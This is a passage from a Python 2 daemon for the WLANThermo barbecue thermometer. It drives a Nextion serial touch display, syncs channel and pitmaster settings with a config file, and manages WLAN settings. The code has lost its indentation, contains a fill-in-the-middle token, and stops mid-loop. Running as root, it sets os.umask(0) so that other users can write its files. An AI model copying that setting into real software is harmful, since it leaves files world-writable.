# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys
import ConfigParser
import os
import time
import logging
import pyinotify
import serial
import subprocess
import threading
import re
import string
import signal
import Queue
from struct import *
NX_lf = '\xff\xff\xff'
NX_channel = 0
NX_page = 0
version = '0.18'
temps = dict()
channels = dict()
pitmaster = dict()
pitconf = dict()
# Events werden vom Display asynchron gesendet
NX_eventq = Queue.Queue()
# Returns werden auf Anforderung zurückgegeben
NX_returnq = Queue.Queue()
# Lock für das schreiben in die Konfig
configfile_lock = threading.Lock()
# Neue Temperaturen
temps_event = threading.Event()
# Neue Kanalkonfiguration (= geändertes Konfigfile)
channels_event = threading.Event()
# Neue Pitmasterevents
pitmaster_event = threading.Event()
# Neue Pitmasterkonfiguration (= geändertes Konfigfile)
pitconf_event = threading.Event()
# Event für ein Aufwachen aus dem Sleep-Mode (= geändertes Konfigfile)
NX_wake_event = threading.Event()
# Stop des Prozesses wurde angefordert
stop_event = threading.Event()
# Konfigurationsdatei einlesen
configdefaults = {'dim' : '90',
'timeout': '30',
'serialdevice': '/dev/ttyAMA0',
'serialspeed': '115200'}
configfile = '/var/www/conf/WLANThermo.conf'
Config = ConfigParser.SafeConfigParser(configdefaults)
# Wir laufen als root, auch andere müssen die Config schreiben!
os.umask (0)
for i in range(0,5):
while True:
try:
Config.read(configfile)
except IndexError:
# Auf Event warten geht hier noch nicht, da wir die anderen Pfade aus der Config brauchen
# Logging geht auch noch nicht, da wir das Logfile brauchen, als an StdErr
sys.stderr.write('Warte auf Konfigurationsdatei')
time.sleep(1)
continue
break
# Logging initialisieren
LOGFILE = Config.get('daemon_logging', 'log_file')
logger = logging.getLogger('WLANthermoNEXTION')
#Define Logging Level by changing >logger.setLevel(logging.LEVEL_YOU_WANT)< available: DEBUG, INFO, WARNING, ERROR, CRITICAL
log_level = Config.get('daemon_logging', 'level_DISPLAY')
if log_level == 'DEBUG':
logger.setLevel(logging.DEBUG)
if log_level == 'INFO':
logger.setLevel(logging.INFO)
if log_level == 'ERROR':
logger.setLevel(logging.ERROR)
if log_level == 'WARNING':
logger.setLevel(logging.WARNING)
if log_level == 'CRITICAL':
logger.setLevel(logging.CRITICAL)
handler = logging.FileHandler(LOGFILE)
handler.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
handler.setFormatter(formatter)
logger.addHandler(handler)
logging.captureWarnings(True)
# Pfad fuer die Übergabedateien auslesen
curPath, curFile = os.path.split(Config.get('filepath','current_temp'))
pitPath, pitFile = os.path.split(Config.get('filepath','pitmaster'))
confPath, confFile = os.path.split(configfile)
# Wenn das display Verzeichniss im Ram Drive nicht exisitiert erstelle es
if not os.path.exists(curPath):
os.makedirs(curPath)
class FileEvent(pyinotify.ProcessEvent):
def process_IN_CLOSE_WRITE(self, event):
global temps, channels, pitmaster, pitconf, Config, configfile
global temps_event, channels_event, pitmaster_event, pitconf_event, logger
logger.debug("IN_CLOSE_WRITE: %s " % os.path.join(event.path, event.name))
if event.path == curPath and event.name == curFile:
logger.debug('Neue Temperaturwerte vorhanden')
temps_event.set()
elif event.path == confPath and event.name == confFile:
logger.debug('Neue Konfiguration vorhanden')
channels_event.set()
pitconf_event.set()
elif event.path == pitPath and event.name == pitFile:
logger.debug('Neue Pitmasterdaten vorhanden')
pitmaster_event.set()
def process_IN_MOVED_TO(self, event):
global temps, channels, pitmaster, pitconf, Config, configfile
global temps_event, channels_event, pitmaster_event, pitconf_event, logger
logger.debug("IN_MOVED_TO: %s " % os.path.join(event.path, event.name))
if event.path == curPath and event.name == curFile:
logger.debug('Neue Temperaturwerte vorhanden')
temps_event.set()
elif event.path == confPath and event.name == confFile:
logger.debug('Neue Konfiguration vorhanden')
channels_event.set()
pitconf_event.set()
elif event.path == pitPath and event.name == pitFile:
logger.debug('Neue Pitmasterdaten vorhanden')
pitmaster_event.set()
def NX_reader():
global logger, ser, NX_returns, NX_events, stop_event, NX_wake_event
logger.info('Reader-Thread gestartet')
# Timeout setzen, damit der Thread gestoppt werden kann
ser.timeout = 0.1
# Dauerschleife, bricht ab wenn ein stop_event vorlieg
while not stop_event.is_set():
is_return = False
endcount = 0
bytecount = 0
message = {'raw' : '', 'iserr' : False, 'errmsg' : '', 'data' : {}, 'type': ''}
while (endcount != 3):
byte = ser.read()
if byte != '':
# Kein Timeout
bytecount += 1
message['raw'] += byte[0]
if (byte[0] == '\xff'):
endcount += 1
else:
endcount = 0
else:
# Timeout, sollen wir stoppen?
if stop_event.is_set():
break
if stop_event.is_set():
break
elif (message['raw'][0] == '\x00'):
message['type'] = 'inv_instr'
message['iserr'] = True
message['errmsg'] = 'Invalid instruction'
is_return = True
elif (message['raw'][0] == '\x01'):
message['type'] = 'ok'
message['errmsg'] = 'Successful execution of instruction'
is_return = True
elif (message['raw'][0] == '\x03'):
message['type'] = 'inv_pageid'
message['iserr'] = True
message['errmsg'] = 'Page ID invalid'
is_return = True
elif (message['raw'][0] == '\x04'):
message['type'] = 'inv_pictid'
message['iserr'] = True
message['errmsg'] = 'Picture ID invalid'
is_return = True
elif (message['raw'][0] == '\x05'):
message['type'] = 'inv_fontid'
message['iserr'] = True
message['errmsg'] = 'Font ID invalid'
is_return = True
elif (message['raw'][0] == '\x11'):
message['type'] = 'inv_baudrate'
message['iserr'] = True
message['errmsg'] = 'Baud rate setting invalid'
is_return = True
elif (message['raw'][0] == '\x12'):
message['type'] = 'inv_curve'
message['iserr'] = True
message['errmsg'] = 'Curve control ID number or channel number is invalid'
is_return = True
elif (message['raw'][0] == '\x1a'):
message['type'] = 'inv_varname'
message['iserr'] = True
message['errmsg'] = 'Variable name invalid '
is_return = True
elif (message['raw'][0] == '\x1B'):
message['type'] = 'inv_varop'
message['iserr'] = True
message['errmsg'] = 'Variable operation invalid'
is_return = True
elif (message['raw'][0] == '\x65'):
message['type'] = 'touch_event'
message['errmsg'] = 'Touch event return data'
message['data'] = {'page': unpack('B', message['raw'][1])[0], 'button': unpack('B', message['raw'][2])[0], 'event':['release', 'press'][unpack('B', message['raw'][3])[0]]}
elif (message['raw'][0] == '\x66'):
message['type'] = 'current_page'
message['errmsg'] = 'Current page ID number return'
message['data'] = {'page': unpack('B',message['raw'][1])[0]}
elif (message['raw'][0] == '\x67'):
message['type'] = 'touch_coord'
message['errmsg'] = 'Touch coordinate data returns'
message['data'] = {'x': unpack('>h', message['raw'][1:3])[0],'y': unpack('>h', message['raw'][3:5])[0], 'event':['release', 'press'][unpack('B', message['raw'][5])[0]]}
elif (message['raw'][0] == '\x68'):
message['type'] = 'touch_coord_sleep'
message['errmsg'] = 'Touch Event in sleep mode'
message['data'] = {'x': unpack('>h', message['raw'][1:3])[0] ,'y': unpack('>h', message['raw'][3:5])[0], 'event':['release', 'press'][unpack('B', message['raw'][5])[0]]}
elif (message['raw'][0] == '\x70'):
message['type'] = 'data_string'
message['errmsg'] = 'String variable data returns'
message['data'] = unpack((str(bytecount - 4)) + 's', message['raw'][1:-3])[0]
is_return = True
elif (message['raw'][0] == '\x71'):
message['type'] = 'data_int'
message['errmsg'] = 'Numeric variable data returns'
message['data'] = unpack('<i', message['raw'][1:5])[0]
is_return = True
elif (message['raw'][0] == '\x86'):
message['type'] = 'sleep'
message['errmsg'] = 'Device automatically enters into sleep mode'
NX_wake_event.clear()
elif (message['raw'][0] == '\x87'):
message['type'] = 'wakeup'
message['errmsg'] = 'Device automatically wake up'
# Device ist aufgewacht...
NX_wake_event.set()
elif (message['raw'][0] == '\x88'):
message['type'] = 'startup'
message['errmsg'] = 'System successful start up'
elif (message['raw'][0] == '\x89'):
message['type'] = 'sdupgrade'
message['errmsg'] = 'Start SD card upgrade'
# Selbst definierte Kommandos
elif (message['raw'][0] == '\x40'):
message['type'] = 'read_cmd'
message['errmsg'] = 'Request to read from Display'
message['data'] = {'area': unpack('B', message['raw'][1])[0], 'id': unpack('B', message['raw'][2])[0]}
elif (message['raw'][0] == '\x41'):
message['type'] = 'custom_cmd'
message['errmsg'] = 'Execute Special Command'
message['data'] = {'area': unpack('B', message['raw'][1])[0], 'id': unpack('B', message['raw'][2])[0], 'action': unpack('B', message['raw'][3])[0]}
logger.debug('Area: ' + str(message['data']['area']) + ' ID: ' + str(message['data']['id']) + ' Action: ' + str(message['data']['action']))
logger.debug('Meldung ' + message['type'] + ' vom Display erhalten')
if (is_return):
NX_returnq.put(message)
else:
NX_eventq.put(message)
logger.info('Reader-Thread gestoppt')
return True
def NX_waitok():
global stop_event
endcount = 0
bytecount = 0
ok = False
while (endcount != 3 or not stop_event.is_set()):
byte = ser.read()
if byte == '':
logger.info('Serial Communication Timeout!')
break
bytecount += 1
if (byte[0] == '\xff'):
endcount += 1
elif (byte[0] == '\x01' and bytecount == 1):
endcount = 0
ok = True
else:
endcount = 0
if ok == True:
return True
else:
return False
def NX_init(port, baudrate):
global ser, NX_lf, NX_reader_thread
ser.port = port
ser.baudrate = baudrate
ser.timeout = 1
ser.open()
logger.debug('Leere seriellen Buffer')
# Buffer des Displays leeren
# - Ungültigen Befehl senden
# - Aufwachbefehl senden
ser.write('nop' + NX_lf)
ser.write('sleep=0' + NX_lf)
# - Warten
ser.flush()
time.sleep(0.2)
# - Empfangene Zeichen löschen
ser.flushInput()
# Immer eine Rückmeldung erhalten
ser.write('ref 0' + NX_lf)
ser.flush()
return NX_waitok()
def NX_sendvalues(values):
global ser, NX_lf, NX_returnq, NX_wake_event
# NX_sendcmd('sleep=0')
error = False
for rawkey, value in values.iteritems():<|fim▁hole|> # Länge wird im Key mit codiert "key:länge"
keys = rawkey.split(':')
key = keys[0]
if len(keys) == 2:
length = int(keys[1])
else:
length = None
# Sendet die Daten zum Display und wartet auf eine Rückmeldung
logger.debug("Sende " + key + ' zum Display: ' + str(value))
if key[-3:] == 'txt':
ser.write(str(key) + '="' + str(value)[:length] + '"\xff\xff\xff')
elif key[-3:] == 'val':
ser.write(str(key) + '=' + str(value) + '\xff\xff\xff')
else:
logger.warning('Unbekannter Variablentyp')
ser.flush()
try:
ret = NX_returnq.get(timeout=1)
except Queue.Empty:
logger.warning('Timeout - möglicherweise Sleep-Mode')
error = True
break
else:
NX_returnq.task_done()
if ret['iserr']:
logger.warning('Fehlermeldung ' + ret['type'] + ' vom Display erhalten')
error = True
else:
logger.debug('Meldung ' + ret['type'] + ' vom Display erhalten')
if error:
return False
return True
def NX_getvalues(ids):
global ser, NX_lf, NX_returnq
error = False
returnvalues = dict()
try:
while True:
ret = NX_returnq.get(False)
logger.info('Unerwartete Meldung ' + ret['type'] + ' vom Display erhalten (aus Displayprogramm)')
except Queue.Empty:
for id in ids:
# Sendet die Daten zum Display und wartet auf eine Rückmeldung
logger.debug("Hole " + str(id) + ' vom Display')
ser.write('get ' + str(id) + '\xff\xff\xff')
ser.flush()
try:
ret = NX_returnq.get(0.5)
NX_returnq.task_done()
if ret['iserr']:
logger.warning('Fehlermeldung ' + ret['type'] + ' vom Display erhalten')
error = True
else:
# Gehen wir von einem "OK" aus, was sonst?
logger.debug('Meldung ' + ret['type'] + ' vom Display erhalten')
# OK, dann Daten abholen
if ret['type'] == 'data_string':
logger.debug('String "' + ret['data'] + '" vom Display erhalten')
elif ret['type'] == 'data_int':
logger.debug('Integer "' + ret['data'] + '" vom Display erhalten')
else:
logger.info('Unerwartete Meldung ' + ret['type'] + ' vom Display erhalten')
if not error:
returnvalues[id] = ret['data']
error = True
except Queue.Empty:
logger.warning('Keine Rückmeldung vom Display erhalten')
error = True
return returnvalues
def NX_getvalue(id):
global ser, NX_lf, NX_returnq
error = False
# Sendet die Daten zum Display und wartet auf eine Rückmeldung
logger.debug("Hole " + str(id) + ' vom Display')
try:
while True:
ret = NX_returnq.get(False)
logger.info('Unerwartete Meldung ' + ret['type'] + ' vom Display erhalten (aus Displayprogramm)')
except Queue.Empty:
ser.write('get ' + str(id) + '\xff\xff\xff')
ser.flush()
try:
ret = NX_returnq.get(True, 0.5)
NX_returnq.task_done()
if ret['iserr']:
logger.warning('Fehlermeldung ' + ret['type'] + ' vom Display erhalten')
error = True
else:
# OK, dann Daten abholen
if ret['type'] == 'data_string':
logger.debug('String "' + ret['data'] + '" vom Display erhalten')
elif ret['type'] == 'data_int':
logger.debug('Integer "' + str(ret['data']) + '" vom Display erhalten')
else:
logger.info('Unerwartete Meldung ' + ret['type'] + ' vom Display erhalten')
except Queue.Empty:
logger.warning('Keine Rückmeldung vom Display erhalten')
error = True
if not error:
return ret['data']
else:
return None
def NX_sendcmd(cmd):
global ser, NX_returnq
error = False
# Sendet die Daten zum Display und wartet auf eine Rückmeldung
logger.debug('Sende Befehl "' + str(cmd) + '" zum Display')
try:
while True:
ret = NX_returnq.get(False)
logger.info('Unerwartete Meldung ' + ret['type'] + ' vom Display erhalten (aus Displayprogramm)')
NX_returnq.task_done()
except Queue.Empty:
ser.write(str(cmd) + '\xff\xff\xff')
ser.flush()
try:
ret = NX_returnq.get(True, 0.5)
NX_returnq.task_done()
if ret['iserr']:
logger.warning('Fehlermeldung ' + ret['type'] + ' vom Display erhalten')
error = True
else:
logger.debug('Meldung ' + ret['type'] + ' vom Display erhalten')
except Queue.Empty:
logger.warning('Keine Rückmeldung vom Display erhalten')
error = True
if error:
return False
return True
def NX_switchpage(new_page):
global ser, NX_returnq, NX_page
error = False
logger.debug("Sende Seitenwechsel zu " + str(new_page))
try:
while True:
ret = NX_returnq.get(False)
logger.info('Unerwartete Meldung ' + ret['type'] + ' vom Display erhalten (aus Displayprogramm)')
except Queue.Empty:
ser.write('page ' + str(new_page) + '\xff\xff\xff')
ser.flush()
try:
ret = NX_returnq.get(True, 0.5)
if ret['iserr']:
logger.error('Fehlermeldung ' + ret['type'] + ' vom Display erhalten')
error = True
else:
logger.debug('Meldung ' + ret['type'] + ' vom Display erhalten')
except Queue.Empty:
logger.warning('Keine Rückmeldung vom Display erhalten')
error = True
if error:
return False
NX_page = new_page
return True
def sensors_getvalues():
sensors = dict()
sensorconfig = ConfigParser.SafeConfigParser()
sensorconfig.read('/var/www/conf/sensor.conf')
for section in sensorconfig.sections():
sensors[sensorconfig.getint(section, 'number')] = dict()
sensors[sensorconfig.getint(section, 'number')]['name'] = sensorconfig.get(section, 'name')
return sensors
def temp_getvalues():
global logger, curPath, curFile
temps = dict()
if os.path.isfile(curPath + '/' + curFile):
logger.debug("Daten vom WLANThermo zum Anzeigen vorhanden")
ft = open(curPath + '/' + curFile).read()
temps_raw = ft.split(';')
temps = dict()
temps['timestamp'] = timestamp = time.mktime(time.strptime(temps_raw[0],'%d.%m.%y %H:%M:%S'))
for count in range(8):
temps[count] = {'value': temps_raw[count+1], 'alert': temps_raw[count+9]}
else:
return None
return temps
def tempcsv_write(config):
name ='/var/www/temperaturen.csv'
logger.debug('Schreibe Temperaturen in "' + name + '" neu!')
while True:
try:
fw = open(name + '_tmp','w') #Datei anlegen
for i in range(8):
fw.write(str(config.get('temp_max','temp_max' + str(i))) + '\n') # Alarm-Max-Werte schreiben
for i in range(8):
fw.write(str(config.get('temp_min','temp_min' + str(i))) + '\n') # Alarm-Min-Werte schreiben
fw.flush()
os.fsync(fw.fileno())
fw.close()
os.rename(name + '_tmp', name)
except IndexError:
time.sleep(0.1)
continue
break
def set_tempflag():
# Flag Datei für WebGUI anlegen
open('/var/www/tmp/flag', 'w').close()
def channels_setvalues(channel, high= None, low=None, sensor=None):
global configfile, configfile_lock
restart_comp = False
temp_changed = False
with configfile_lock:
newconfig = ConfigParser.SafeConfigParser()
newconfig.read(configfile)
if low != None:
newconfig.set('temp_min','temp_min' + str(channel), str(low))
temp_changed = True
if high != None:
newconfig.set('temp_max','temp_max' + str(channel), str(high))
temp_changed = True
if sensor != None:
newconfig.set('Sensoren','ch' + str(channel), str(sensor))
restart_comp = True
if restart_comp:
newconfig.set('ToDo','restart_thermo', 'True')
elif temp_changed:
tempcsv_write(newconfig)
if temp_changed:
set_tempflag()
config_write(configfile, newconfig)
def display_getvalues():
global configfile, configfile_lock
defaults = {'dim':'90', 'timeout':'30', 'start_page':'main', 'serialdevice':'/dev/ttyAMA0', 'serialspeed':'9600'}
display = {}
with configfile_lock:
config = ConfigParser.SafeConfigParser(defaults)
config.read(configfile)
display['dim'] = config.getint('Display','dim')
display['timeout'] = config.getint('Display','timeout')
display['start_page'] = config.get('Display','start_page')
display['serialdevice'] = Config.get('Display', 'serialdevice')
display['serialspeed'] = Config.getint('Display', 'serialspeed')
return display
def display_setvalues(dim = None, timeout = None):
global configfile, configfile_lock
with configfile_lock:
newconfig = ConfigParser.SafeConfigParser()
newconfig.read(configfile)
if dim != None:
newconfig.set('Display','dim', str(dim))
if timeout != None:
newconfig.set('Display','timeout', str(timeout))
config_write(configfile, newconfig)
def todo_setvalues(pi_down = None, pi_reboot = None):
global configfile, configfile_lock
with configfile_lock:
newconfig = ConfigParser.SafeConfigParser()
newconfig.read(configfile)
if pi_down != None:
newconfig.set('ToDo','raspi_shutdown', ['False', 'True'][pi_down])
if pi_reboot != None:
newconfig.set('ToDo','raspi_reboot', ['False', 'True'][pi_reboot])
config_write(configfile, newconfig)
def pitmaster_setvalues(pit_ch = None, pit_set = None, pit_lid= None, pit_on = None, pit_pid = None, pit_type = None, pit_inverted = None):
global configfile, configfile_lock
with configfile_lock:
newconfig = ConfigParser.SafeConfigParser()
newconfig.read(configfile)
if pit_ch != None:
newconfig.set('Pitmaster','pit_ch', str(pit_ch))
if pit_inverted != None:
newconfig.set('Pitmaster','pit_inverted', ['False', 'True'][pit_inverted])
if pit_set != None:
newconfig.set('Pitmaster','pit_set', str(pit_set))
if pit_lid != None:
newconfig.set('Pitmaster','pit_open_lid_detection', ['False', 'True'][pit_lid])
if pit_on != None:
newconfig.set('ToDo','pit_on', ['False', 'True'][pit_on])
if pit_pid != None:
newconfig.set('Pitmaster','pit_controller_type', ['False', 'PID'][pit_pid])
if pit_type != None:
newconfig.set('Pitmaster','pit_type', ['fan', 'servo', 'io', 'io_pwm', 'fan_pwm'][pit_type])
config_write(configfile, newconfig)
def channels_getvalues():
global logger, configfile, configfile_lock
logger.debug('Lade Kanalkonfiguration aus Logfile')
channels = {}
with configfile_lock:
Config = ConfigParser.SafeConfigParser()
Config.read(configfile)
for i in range(8):
channel = {}
channel['sensor'] = Config.getint('Sensoren', 'ch' + str(i))
channel['logging'] = Config.getboolean('Logging', 'ch' + str(i))
channel['web_alert'] = Config.getboolean('web_alert', 'ch' + str(i))
channel['name'] = Config.get('ch_name', 'ch_name' + str(i))
channel['show'] = Config.getboolean('ch_show', 'ch' + str(i))
channel['temp_min'] = Config.getint('temp_min', 'temp_min' + str(i))
channel['temp_max'] = Config.getint('temp_max', 'temp_max' + str(i))
channels[i] = channel
return channels
def pitmaster_config_getvalues():
global configfile, configfile_lock
pitconf = dict()
with configfile_lock:
Config = ConfigParser.SafeConfigParser()
Config.read(configfile)
pitconf['on'] = Config.getboolean('ToDo','pit_on')
pitconf['type'] = Config.get('Pitmaster','pit_type')
pitconf['inverted'] = Config.getboolean('Pitmaster','pit_inverted')
pitconf['curve'] = Config.get('Pitmaster','pit_curve')
pitconf['set'] = Config.getfloat('Pitmaster','pit_set')
pitconf['ch'] = Config.getint('Pitmaster','pit_ch')
pitconf['pause'] = Config.getfloat('Pitmaster','pit_pause')
pitconf['pwm_min'] = Config.getfloat('Pitmaster','pit_pwm_min')
pitconf['pwm_max'] = Config.getfloat('Pitmaster','pit_pwm_max')
pitconf['man'] = Config.getint('Pitmaster','pit_man')
pitconf['Kp'] = Config.getfloat('Pitmaster','pit_kp')
pitconf['Kd'] = Config.getfloat('Pitmaster','pit_kd')
pitconf['Ki'] = Config.getfloat('Pitmaster','pit_ki')
pitconf['Kp_a'] = Config.getfloat('Pitmaster','pit_kp_a')
pitconf['Kd_a'] = Config.getfloat('Pitmaster','pit_kd_a')
pitconf['Ki_a'] = Config.getfloat('Pitmaster','pit_ki_a')
pitconf['switch_a'] = Config.getfloat('Pitmaster','pit_switch_a')
pitconf['controller_type'] = Config.get('Pitmaster','pit_controller_type')
pitconf['iterm_min'] = Config.getfloat('Pitmaster','pit_iterm_min')
pitconf['iterm_max'] = Config.getfloat('Pitmaster','pit_iterm_max')
pitconf['open_lid_detection'] = Config.getboolean('Pitmaster','pit_open_lid_detection')
pitconf['open_lid_pause'] = Config.getfloat('Pitmaster','pit_open_lid_pause')
pitconf['open_lid_falling_border'] = Config.getfloat('Pitmaster','pit_open_lid_falling_border')
pitconf['open_lid_rising_border'] = Config.getfloat('Pitmaster','pit_open_lid_rising_border')
return pitconf
def pitmaster_getvalues():
global logger, pitPath, pitFile
temps = dict()
if os.path.isfile(pitPath + '/' + pitFile):
logger.debug("Daten vom Pitmaster zum Anzeigen vorhanden")
fp = open(pitPath + '/' + pitFile).read()
pitmaster_raw = fp.split(';',4)
# Es trägt sich zu, das im Lande WLANThermo manchmal nix im Pitmaster File steht
# Dann einfach munter so tun als ob einfach nix da ist
#TODO Fix everything
if pitmaster_raw[0] == '':
return None
timestamp = time.mktime(time.strptime(pitmaster_raw[0],'%d.%m.%y %H:%M:%S'))
pitmaster = {'timestamp': timestamp, 'set': float(pitmaster_raw[1]), 'now': float(pitmaster_raw[2]),'new': float(pitmaster_raw[3].rstrip('%')),'msg': pitmaster_raw[4]}
else:
return None
return pitmaster
def lan_getvalues():
interfacelist = ['eth0', 'eth1', 'wlan0', 'wlan1']
interfaces = dict()
for interface in interfacelist:
retvalue = os.popen("LANG=C ifconfig " + interface + " 2>/dev/null | grep 'inet ' | cut -d':' -f2| cut -d' ' -f1").readlines()
if (len(retvalue)!=0):
interfaces[interface] = {'name': interface, 'ip': retvalue[0].strip()}
return interfaces
def wlan_getsignal(interface):
logger.debug('Hole Signalstärke für "' + interface + '"')
retvalue = os.popen("LANG=C iwconfig " + interface + " 2>/dev/null").readlines()
for line in retvalue:
if 'Link Quality=' in line:
quality = re.match('.*Link Quality=(\S*)',line).group(1)
if '/' in quality:
(val, div) = quality.split('/')
quality = int(round(float(val) / float(div) * 100.0))
return quality
return None
def wlan_getssids():
ssidlist = os.popen("iwlist wlan0 scan").readlines()
ssids = list()
for line in ssidlist:
if "ESSID:" in line:
ssid = re.match('.*ESSID:"(.*)"',line).group(1)
if not ssid in ssids:
ssids.append(ssid)
return ssids
def wlan_reconnect():
os.system('ifdown wlan0')
time.sleep(1)
os.system('ifup wlan0')
def wlan_setpassphrase(ssid, psk):
logger.debug('Setze WPA Passhrase für: ' + ssid)
fw = file('/etc/wpa_supplicant/wpa_supplicant.conf').readlines()
ssids = list()
psks = list()
ssid_found = False
for line in fw:
if re.search(r'SSID',line,re.IGNORECASE):
ssids.append(line.split("=")[1].replace('"','').strip())
elif re.search(r'\#psk',line,re.IGNORECASE):
psks.append(line.split("=")[1].replace('"','').strip())
wpa_file = open('/etc/wpa_supplicant/wpa_supplicant.conf' + '_tmp', 'w')
wpa_file.write('ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=netdev\n')
wpa_file.write('update_config=1\n')
if ssids:
for i in range(len(ssids)):
logger.debug('Schreibe wpa_supplicant.conf für: ' + ssids[i])
if ssid == ssids[i]:
# Wert verändert
logger.debug('SSID bereits in Config, PSK ändern')
wpa_passphrase = subprocess.Popen(("/usr/bin/wpa_passphrase", str(ssid), str(psk)), stdout=subprocess.PIPE, stderr=subprocess.STDOUT).stdout.readlines()
ssid_found = True
else:
# neue SSID
logger.debug('SSID und PSK aus alter Datei übernommen')
wpa_passphrase = subprocess.Popen(("/usr/bin/wpa_passphrase", str(ssids[i]), str(psks[i])), stdout=subprocess.PIPE, stderr=subprocess.STDOUT).stdout.readlines()
if wpa_passphrase[0] != "Passphrase must be 8..63 characters":
for line in wpa_passphrase:
wpa_file.write(line)
else:
logger.warning('Neuer PSK zu kurz für SSID: ' + ssid)
if not ssid_found:
# SSID nicht in konfigurierten WLANs, das neue hinzufügen
logger.debug('Schreibe wpa_supplicant.conf für: ' + ssid)
wpa_passphrase = subprocess.Popen(("/usr/bin/wpa_passphrase", str(ssid), str(psk)), stdout=subprocess.PIPE, stderr=subprocess.STDOUT).stdout.readlines()
if wpa_passphrase[0] != "Passphrase must be 8..63 characters":
for line in wpa_passphrase:
wpa_file.write(line)
else:
logger.warning('Neuer PSK zu kurz für SSID: ' + ssid)
wpa_file.flush()
os.fsync(wpa_file.fileno())
wpa_file.close()
os.rename('/etc/wpa_supplicant/wpa_supplicant.conf' + '_tmp', '/etc/wpa_supplicant/wpa_supplicant.conf')
return True
def alert_setack():
try:
os.mknod('/var/www/alert.ack')
except OSError:
pass
def NX_display():
logger.info('Display-Thread gestartet')
global NX_page, NX_channel, stop_event, NX_eventq
global temps_event, channels_event, pitmaster_event, pitmasterconfig_event
global Config
# Version des Displays prüfen
display_version = str(NX_getvalue('main.version.txt'))
logger.info('Version auf dem Display: ' + str(display_version))
if not str(display_version) in ['v1.3']:
logger.info('Update des Displays notwendig')
NX_sendcmd('page update')
open('/var/www/tmp/nextionupdate', 'w').close()
stop_event.wait()
return False
if os.path.isfile('/var/www/tmp/nextionupdate'):
# Update-Flag löschen wenn Version i.O.
os.unlink('/var/www/tmp/nextionupdate')
NX_sendvalues({'boot.text.txt:35':'Temperaturen werden geladen'})
NX_switchpage('boot')
# Werte initialisieren
temps_event.clear()
channels_event.clear()
logger.debug('Hole Temperaturen...')
temps = temp_getvalues()
while temps == None:
logger.info("Wartet auf Temperaturen")
temps_event.wait(0.1)
temps = temp_getvalues()
NX_sendvalues({'boot.text.txt:35':'Konfiguration wird geladen'})
logger.debug('Hole Displaykonfiguration...')
display = display_getvalues()
logger.debug('Hole Sensorkonfiguration...')
sensors = sensors_getvalues()
logger.debug('Hole Kanalkonfiguration...')
channels = channels_getvalues()
logger.debug('Hole Pitmasterkonfiguration...')
pitconf = pitmaster_config_getvalues()
interfaces = lan_getvalues()
# Leere Liste da der Scan etwas dauert...
ssids = []
# Zahl des aktuell gewählen Eintrages
ssids_i = 0
pitmaster = None
if pitconf['on'] == True:
logger.debug('Hole Pitmasterdaten...')
pitmaster = pitmaster_getvalues()
# Kann ein wenig dauern, bis valide Daten geliefert werden, daher nicht mehr warten
if pitmaster == None:
pitmaster = {'timestamp': 0, 'set': 0, 'now': 0,'new': 0,'msg': ''}
values = dict()
for i in range(1, 11):
values['main.sensor_name' + str(i) + '.txt:10'] = sensors[i]['name']
for i in range(8):
if temps[i]['value'] == '999.9':
values['main.kanal' + str(i) + '.txt:10'] = channels[i]['name']
else:
values['main.kanal' + str(i) + '.txt:10'] = temps[i]['value']
values['main.alert' + str(i) + '.txt:10'] = temps[i]['alert']
values['main.al' + str(i) + 'minist.txt:10'] = int(round(channels[i]['temp_min']))
values['main.al' + str(i) + 'maxist.txt:10'] = int(round(channels[i]['temp_max']))
values['main.sensor_type' + str(i) + '.val'] = channels[i]['sensor']
values['main.name' + str(i) + '.txt:10'] = channels[i]['name']
for interface in interfaces:
values['wlaninfo.' + interfaces[interface]['name'] + '.txt:20'] = interfaces[interface]['ip']
values['main.pit_ch.val'] = int(pitconf['ch'])
values['main.pit_power.val'] = int(round(pitmaster['new']))
values['main.pit_set.txt:10'] = round(pitconf['set'],1)
values['main.pit_lid.val'] = int(pitconf['open_lid_detection'])
values['main.pit_on.val'] = int(pitconf['on'])
values['main.pit_inverted.val'] = int(pitconf['inverted'])
values['main.pit_pid.val'] = {'False': 0, 'PID': 1}[pitconf['controller_type']]
# Displayeinstellungen sollten lokal sein und nur für uns
# Ansonsten müsste man hier noch mal ran
values['main.dim.val'] = int(display['dim'])
values['main.timeout.val'] = int(display['timeout'])
# NX_sendcmd('dims=' + str(values['main.dim.val']))
# NX_sendcmd('thsp=' + str(values['main.timeout.val']))
pit_types = {'fan':0, 'servo':1, 'io':2, 'io_pwm':3, 'fan_pwm':4}
values['main.pit_type.val'] = pit_types[pitconf['type']]
NX_sendvalues({'boot.text.txt:35':'Werte werden uebertragen'})
NX_sendvalues(values)
# Ruft die Startseite auf, vorher Text zurücksetzen
NX_sendvalues({'boot.text.txt:35':'Verbindung wird hergestellt'})
NX_sendcmd('page ' + display['start_page'])
NX_wake_event.set()
while not stop_event.is_set():
# idR werden wir bei einem Sleep hier warten
while not stop_event.is_set() and not NX_wake_event.wait(timeout = 0.01):
pass
if not NX_eventq.empty():
event = NX_eventq.get(False)
# Touchevents werden hier behandelt
if event['type'] == 'current_page' :
NX_page = event['data']['page']
elif event['type'] == 'startup':
# Restart des Displays - sterben und auf Wiedergeburt hoffen
logger.warning('Start-Up Meldung vom Display erhalten, breche ab.')
return False
elif event['type'] == 'read_cmd':
if event['data']['area'] == 0:
channel = event['data']['id']
low = NX_getvalue('main.al'+ str(channel)+'minist.txt')
channels_setvalues(channel, low=low)
elif event['data']['area'] == 1:
channel = event['data']['id']
high = NX_getvalue('main.al'+ str(channel)+'maxist.txt')
channels_setvalues(channel, high=high)
elif event['data']['area'] == 2:
channel = event['data']['id']
sensor = NX_getvalue('main.sensor_type'+ str(channel) + '.val')
channels_setvalues(channel, sensor=sensor)
elif event['data']['area'] == 3:
if event['data']['id'] == 0:
# pit_ch
pit_ch = NX_getvalue('main.pit_ch.val')
pitmaster_setvalues(pit_ch = pit_ch)
elif event['data']['id'] == 1:
# pit_set
pit_set = NX_getvalue('main.pit_set.txt')
pitmaster_setvalues(pit_set = pit_set)
elif event['data']['id'] == 2:
# pit_lid
pit_lid = NX_getvalue('main.pit_lid.val')
pitmaster_setvalues(pit_lid = pit_lid)
elif event['data']['id'] == 3:
# pit_on
